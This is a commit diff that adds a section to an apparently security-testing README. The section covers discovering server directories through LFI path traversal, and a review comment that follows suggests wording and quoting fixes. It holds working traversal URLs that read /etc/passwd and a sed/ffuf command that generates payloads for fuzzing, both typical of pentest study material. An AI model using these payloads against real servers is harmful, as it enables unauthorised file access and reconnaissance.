Update README.md

paupaulaz 2022-11-23 17:52:53 +01:00 committed by GitHub
parent abb9bcb43f
commit 211fa80c12
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23


@ -109,6 +109,35 @@ Maybe the back-end is checking the folder path:
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
```
### Identifying folders on a server
Depending on the applicative code / allowed characters, it might be possible to recursively explore the file system by discovering folders and not just files. In order to do so:
- identify the "depth" of you current directory by succesfully retrieving `/etc/passwd` (if on Linux):
```
http://example.com/index.php?page=../../../etc/passwd # depth of 3
````
- try and guess the name of a folder in the current directory by adding the folder name (here, `private`), and then going back to `/etc/passwd`:
```
http://example.com/index.php?page=private/../../../../etc/passwd # we went deeper down one level, so we have to go 3+1=4 levels up to go back to /etc/passwd
```
- if the application is vulnerable, there might be two different outcomes to the request:
- if you get an error / no output, the `private` folder does not exist at this location
- if you get the content from `/etc/passwd`, you validated that there is indeed a `private`folder in your current directory
- the folder(s) you discovered using this techniques can then be fuzzed for files (using a classic LFI method) or for subdirectories using the same technique recursively.
It is possible to adapt this technique to find directories at any location in the file system. For instance, if, under the same hypothesis (current directory at depth 3 of the file system) you want to check if `/var/www/` contains a `private` directory, use the following payload:
```
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
```
The following sequence of commands allows the generation of payloads using `sed` (1) as input for url fuzzing tools such as `ffuf` (2):
```
$ sed 's_^_../../../var/www/_g' /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt | sed 's_$_/../../../etc/passwd_g' > payloads.txt
$ ffuf -u http://example.com/index.php?page=FUZZ -w payloads.txt -mr "root"
```
Of course, adapt there payloads to your needs in terms of depth / location / input directory list.
### **Path truncation**
Bypass the append of more chars at the end of the provided string (bypass of: $\_GET\['param']."php")
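Review bot: the closing fence after the first payload (`http://example.com/index.php?page=../../../etc/passwd # depth of 3`) is four backticks while the opening fence and every other fence in the section use three; CommonMark still closes the block because the closing fence is at least as long as the opening one, but it is easy to misread as a nested fence, so make it three. In the same section, fix "succesfully" to "successfully", "of you current directory" to "of your current directory", add the missing space in "`private`folder", and change "using this techniques" to "using this technique" and "adapt there payloads" to "adapt these payloads". In the `ffuf` line, quote the URL (`-u 'http://example.com/index.php?page=FUZZ'`), since an unquoted `?` is a shell glob character, and the two `sed` passes can be collapsed into one: `sed 's_.*_../../../var/www/&/../../../etc/passwd_'`. Finally, the intro says the technique works "depending on the applicative code" but does not say why: the two outcomes only differ when the back-end passes the raw path to the filesystem, which cannot resolve `private/..` if `private` does not exist; if the application normalises the string before opening it, both probes return `/etc/passwd` and the folder check reveals nothing. One sentence stating that would tell readers when this method applies.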